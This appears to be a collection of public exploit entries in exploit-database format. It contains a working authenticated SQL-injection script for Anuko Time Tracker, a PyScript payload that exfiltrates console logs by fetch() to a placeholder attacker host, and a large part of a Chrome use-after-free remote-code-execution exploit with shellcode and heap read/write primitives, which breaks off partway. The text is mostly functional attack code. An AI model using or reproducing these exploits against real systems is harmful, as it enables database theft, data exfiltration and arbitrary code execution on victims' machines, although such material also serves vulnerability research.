data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
s.recv(45) # Control message
data_size -= 45 # Data size without control message
time.sleep(0.1)
elif data_size < 1024:
data = s.recv(data_size)
#print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
time.sleep(0.1)
print(data.decode())
data_size = 0
else:
data = s.recv(1024)
#print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
time.sleep(0.1)
print(data.decode(),end = '')
data_size -= 1024
# Exploit Title: Anuko Time Tracker - SQLi (Authenticated)
# Date: 2022-05-03
# Exploit Author: Altelus
# Vendor Homepage: https://www.anuko.com/
# Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d
# Version: Anuko Time Tracker 1.20.0.5640
# Tested on: Linux
# CVE : CVE-2022-24707
# An authenticated user can exploit an SQL Injection vulnerability on the Puncher plugin if its enabled.
# User has to start the puncher and stop it but upon stopping an additional parameter 'date' must be passed.
# The 'date' parameter is then injected with SQL payload for leaking database contents.
from time import time
import requests
import argparse
import re
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
def get_puncher_page():
punch_txt = r_client.get(host + "/puncher.php").text
if "Feature is disabled" in punch_txt:
print("[-] Puncher feature is disabled.")
exit(0)
print("[+] Puncher feature is enabled. Picking a project...")
soup = BeautifulSoup(punch_txt, features="lxml")
time_record_form = soup.find("select", {"name" : "project", "id" : "project"})
project_list = time_record_form.findAll("option")
if len(project_list) <= 1:
print("[-] No project to choose from")
exit(0)
f_proj = project_list[1]
print("[*] Picking the first project in the option: [{} - {}]".format(f_proj['value'], f_proj.text))
return f_proj['value']
def login(username, password):
global r_client
data = {
"login" : username,
"password" : password,
"btn_login" : "Login",
}
login_txt = r_client.post(host + "/login.php", data=data).text
if "Incorrect" in login_txt:
print("[-] Failed to login. Credentials are not correct.")
exit(0)
print("[+] Login successful!")
def start_puncher(project_id):
global r_client
data = {
"project": project_id,
"btn_start": "Start",
"browser_today" : "",
"browser_time" : "04:00",
"date": "{}-{}-{}".format(date.year, date.month, date.day)
}
headers = {
"Referer" : host + "/puncher.php"
}
start_p = r_client.post(host + "/puncher.php", data=data, headers=headers).text
if "Uncompleted entry already" in start_p:
print("[-] A running puncher entry is seen. Exiting")
exit(0)
print("[*] Puncher started. Getting id added...")
puncher_p = r_client.get(host + "/puncher.php?date={}-{}-{}".format(date.year, date.month, date.day)).text
time_edit_ids = re.findall("time_edit.php\?id=\d+",puncher_p)
time_edit_ids.sort()
latest_id = time_edit_ids[-1].split("=")[1]
return latest_id
def stop_puncher_sqli(project_id, sqli=""):
get_all_tables = "SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()"
if sqli == "":
sqli = get_all_tables
new_date = date+timedelta(minutes=10)
data = {
"btn_stop": "Stop",
"browser_today" : "",
"browser_time" : "04:10",
"date": "{}-{}-{}', comment=(({})), date='{}-{}-{}".format(date.year, date.month, date.day, sqli, date.year, date.month, date.day)
}
headers = {
"Referer" : host + "/puncher.php"
}
stop_p = r_client.post(host + "/puncher.php", data=data, headers=headers,allow_redirects=False).text
print("[*] Puncher stopped")
def get_puncher_result(puncher_id):
time_edit_p = r_client.get(host + "/time_edit.php?id={}".format(puncher_id)).text
soup = BeautifulSoup(time_edit_p, features="lxml")
note_content = soup.find("textarea", {"name" : "note", "id" : "note"})
print("[+] Leaked: {}".format(note_content.text))
def delete_puncher_entry(puncher_id):
data = {
"delete_button" : "Delete",
"id" : puncher_id
}
headers = {
"Referer" : "http://10.0.2.15/time_delete.php?id={}".format(puncher_id)
}
del_p = r_client.post(host + "/time_delete.php?id={}".format(puncher_id), data=data, headers=headers)
print("[*] Puncher {} deleted".format(puncher_id))
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="Anuko Timetracker username")
parser.add_argument('--password', required=True, help="Anuko Timetracker password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--sqli', required=False, help="SQL query to run. Defaults to getting all tables")
args = parser.parse_args()
r_client = requests.Session()
host = args.host
date = datetime.now()
username = args.username
password = args.password
login(username, password)
proj_id = get_puncher_page()
puncher_id = start_puncher(proj_id)
sqli=""
if args.sqli != None:
sqli = args.sqli
stop_puncher_sqli(proj_id, sqli=sqli)
get_puncher_result(puncher_id)
delete_puncher_entry(puncher_id)
# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
Source Codes Read
# Date: 5-9-2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://pyscript.net/
# Software Link: https://github.com/pyscript/pyscript
# Version: 2022-05-04-Alpha
# Tested on: Ubuntu Apache Server
# CVE : CVE-2022-30286
<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>
# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution
# Date: 2022-05-03
# Exploit Author: deadlock (Forrest Orr)
# Type: RCE
# Platform: Windows
# Website: https://forrest-orr.net
# Twitter: https://twitter.com/_ForrestOrr
# Vendor Homepage: https://www.google.com/chrome/
# Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip
# Versions: Chrome 76 - 78.0.3904.70
# Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 x64
# CVE: CVE-2019-13720
# Bypasses: DEP, High Entropy ASLR, CFG, CET
# Github: https://github.com/forrest-orr/WizardOpium
<html>
<script>
/*;; --------------------------------------------------------------------- |
;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium |
;;;; --------------------------------------------------------------------- |
;;;; Author: deadlock (Forrest Orr) - 2022 |
;;;; --------------------------------------------------------------------- |
;;;; Licensed under GNU GPLv3 |
;;;; --------------------------------------------------------------------- |
;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 |
;;;; 64-bit with CPU core counts: |
;;;; ~ 16 cores (non-virtualized) | works |
;;;; ~ 4 cores (virtualized) | works |
;;;; ~ 2 cores (virtualized) | works |
;;;; ~ 1 core (virtualized) | fails |
;;;; |
;;;; All of these tests finished successfully with a 95%+ success rate |
;;;; with the exception of the 1 core tests, which fail with a 100% |
;;;; frequency. Due to the nature of the exploit as both a UAF highly |
;;;; sensitive to the state of the heap and a race condition, it appears |
;;;; that a single core is unable to reliably reproduce the UAF or any |
;;;; kind of consistency in the heap between executions. |
;;;; --------------------------------------------------------------------- |
;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET |
;;;; --------------------------------------------------------------------- |
;;;; ## Sandboxing |
;;;; ~ Chrome uses an isolated content child proces running under a |
;;;; restricted token below Low Integrity to render JavaScript. |
;;;; ~ Child process creation is restricted via Windows exploit |
;;;; mitigation features on the OS level for Chrome renderers. |
;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a |
;;;; sandbox escape (this was limited to Windows 7 since in newer |
;;;; versions of Windows win32k syscalls are locked in Chrome for |
;;;; security purposes). |
;;;; ~ Run Chrome with the "--no-sandbox" parameter in order to execute |
;;;; the WinExec shellcode within this exploit source. |
;;;; --------------------------------------------------------------------- |
;;;; ## Notes |
;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist |
;;;; for both infoleaks and R/W primitives. |
;;;; ~ The exploit should in theory work in any version of Chrome up to |
;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. |
;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is |
;;;; initialized resulting in the creation of a single page of +RWX |
;;;; JIT memory. This is then overwritten with a 673 byte egghunter |
;;;; shellcode. |
;;;; ~ The egghunter will scan through all committed +RW regions of |
;;;; private memory within the compromised chrome.exe renderer process |
;;;; and mark any region it identifies as +RWX which contains the egg |
;;;; QWORD bytes and subsequentially execute it via a CALL instruction. |
;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 |
;;;; array prefixed by the following egg QWORD bytes: |
;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 |
;;;; --------------------------------------------------------------------- |
;;;; ## Credits |
;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit |
;;;; chain in the wild. |
;;;; -------------------------------------------------------------------- */
const Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]);
const Egghunter = new Uint8Array([ 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0xe8, 0x21, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xd2, 0x33, 0x0e, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6e, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc5, 0x4d, 0x31, 0xe4, 0x4d, 0x31, 0xf6, 0x4d, 0x31, 0xff, 0x4d, 0x85, 0xff, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x4d, 0x01, 0xf4, 0x49, 0xc7, 0xc0, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x41, 0xff, 0xd5, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x83, 0xf8, 0x30, 0x0f, 0x85, 0xc3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x4c, 0x8b, 0x70, 0x18, 0x4c, 0x8b, 0x20, 0x81, 0x78, 0x28, 0x00, 0x00, 0x02, 0x00, 0x75, 0xb1, 0x81, 0x78, 0x20, 0x00, 0x10, 0x00, 0x00, 0x75, 0xa8, 0x83, 0x78, 0x24, 0x04, 0x75, 0xa2, 0x4c, 0x89, 0xf1, 0x48, 0x83, 0xe9, 0x08, 0x48, 0x31, 0xd2, 0x48, 0xff, 0xca, 0x48, 0xbb, 0x10, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0xff, 0xc3, 0x48, 0xff, 0xc2, 0x48, 0x39, 0xca, 0x7d, 0x80, 0x49, 0x39, 0x1c, 0x14, 0x74, 0x02, 0xeb, 0xf0, 0x4d, 0x8d, 0x3c, 0x14, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x08, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7f, 0x13, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x10, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7c, 0x05, 0x4d, 0x31, 0xff, 0xeb, 0xcb, 0x48, 0x31, 0xc9, 0x49, 0x89, 0x0c, 0x14, 0x48, 0xc7, 0xc2, 0x3c, 0xd1, 0x38, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x9f, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4d, 0xc0, 0x49, 0xc7, 0xc0, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x48, 0x8b, 0x52, 0x18, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0x49, 0x83, 0xc7, 0x08, 0x41, 0xff, 0xd7, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0x18, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x76, 0x7e, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0x65, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x75, 0x4c, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x7c, 0x16, 0x48, 0x39, 0xd0, 0x7d, 0x11, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0x76, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]);
let DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory.
let GcPreventer = [];
let IIRFilters = [];
var SharedAudioCtx = undefined;
let FeedforwardSuperPageMetadata = undefined;
let OutputFloatArray = new Float32Array(10);
let MutableFreeListAudioBufs = [];
let DoubleAllocAudioBufs = [];
let ImageDataArray = [];
const EnableDebug = true;
const AlertOutput = false;
var HelperBuf = new ArrayBuffer(8);
var HelperDbl = new Float64Array(HelperBuf);
var HelperDword = new Uint32Array(HelperBuf);
var HelperBigInt = new BigUint64Array(HelperBuf);
var HelperUint8 = new Uint8Array(HelperBuf);
function DebugLog(Message) {
if(EnableDebug) {
if(AlertOutput) {
alert(Message);
}
else {
console.log(Message); // In IE, console only works if devtools is open.
}
}
}
function Sleep(delay) {
return new Promise(resolve => setTimeout(resolve, delay))
}
function ReverseBigInt(Val) {
let ReversedVal = BigInt(0);
let TempVal = Val;
for (let i = 0; i < 8; i++) {
ReversedVal = ReversedVal << BigInt(8);
ReversedVal += TempVal & BigInt(0xFF);
TempVal = TempVal >> BigInt(8);
}
return ReversedVal;
}
function ClearBigIntLow21(Val) {
let BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111
let ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000
return ClearedVal;
}
let GetSuperPageBase = ClearBigIntLow21;
function GetSuperPageMetadata(LeakedPtr) {
let SuperPageBase = GetSuperPageBase(LeakedPtr);
return SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pagees, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page
}
function GetPartitionPageIndex(LeakedPtr) {
let Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1);
let Index = (LeakedPtr & Low21Mask) >> BigInt(14);
return Index;
}
function GetPartitionPageMetadata(LeakedPtr) {
let Index = GetPartitionPageIndex(LeakedPtr);
let partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20));
return partitionPageMetadataPtr;
}
function GetPartitionPageBase(LeakedPtr, Index) {
let SuperPageBase = GetSuperPageBase(LeakedPtr);
let PartitionPageBase = SuperPageBase + (Index << BigInt(14));
return PartitionPageBase;
}
function GC() {
let MyPromise = new Promise(function(GcCallback) {
let Arg;
for (var i = 0; i < 400; i++) {
new ArrayBuffer(1024 * 1024 * 60).buffer;
}
GcCallback(Arg);
});
return MyPromise;
}
/*
chrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf:
00007ffa`cc086513 488b0e mov rcx,qword ptr [rsi] ds:00007ffe`0fc70000=????????????????
*/
function LeakQword(FreeListHead, TargetAddress) {
FreeListHead[0] = TargetAddress;
let TempVal = new BigUint64Array;
TempVal.buffer;
GcPreventer.push(TempVal);
return ReverseBigInt(FreeListHead[0]);
}
function WriteQword(FreeListHead, TargetAddress, Val) {
FreeListHead[0] = TargetAddress;
let TempVal = new BigUint64Array(1);
TempVal.buffer;
TempVal[0] = Val;
GcPreventer.push(TempVal);
}
function CreateWasmJITExport() {
/*
After this function returns, a new region of memory will appear with a
single system page of 0x1000 bytes set to RWX for the JIT region for
this WASM module
0x00000ACDB6790000:0x40000000 | Private
0x00000ACDB6790000:0x00001000 | RX | 0x00000000 | Abnormal private executable memory
0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory
*/
var ImportObj = { imports: { imported_func: arg => console.log(arg) } };
const WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
const WasmCode = new Uint8Array(WasmModuleBytes);
const WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj);
return WasmModule.exports.exported_func;
}
/*
struct __attribute__((packed)) SlotSpanMetadata {
unsigned long freelist_head;
unsigned long next_slot_span;
unsigned long bucket;
uint32_t marked_full : 1;
uint32_t num_allocated_slots : 13;
uint32_t num_unprovisioned_slots : 13;
uint32_t can_store_raw_size : 1;
uint32_t freelist_is_sorted : 1;
uint32_t unused1 : (32 - 1 - 2 * 13 - 1 - 1);
uint16_t in_empty_cache : 1;
uint16_t empty_cache_index : 7;
uint16_t unused2 : (16 - 1 - 7);
};
struct PartitionPage {
union {
struct SlotSpanMetadata span;
size_t raw_size;
struct PartitionSuperPageExtentEntry head;
struct {
char pad[32 - sizeof(uint16_t)];
uint16_t slot_span_metadata_offset;
};
};
};
struct PartitionBucket {
unsigned long active_slot_spans_head;
unsigned long empty_slot_spans_head;
unsigned long decommitted_slot_spans_head;
uint32_t slot_size;
uint32_t num_system_pages_per_slot_span : 8;
uint32_t num_full_slot_spans : 24;
};
*/
function HuntSlotSpanHead(FreeListHead, SlotSize, SuperPageMetadataBase) {
for(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) {
SlotSpanMetaAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct
HelperBigInt[0] = SlotSpanMetaAddress;
DebugLog("... targetting slot span metadata at " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
BucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress);
HelperBigInt[0] = BucketAddress;
DebugLog("... leaked bucket address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
if(BucketAddress != BigInt(0)) {
BucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size
BucketSize = LeakQword(FreeListHead, BucketAddress);
HelperBigInt[0] = BucketSize;
DebugLog("... leaked bucket size is " + HelperDword[1].toString(16) + " " + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
if(HelperDword[0] == SlotSize) {
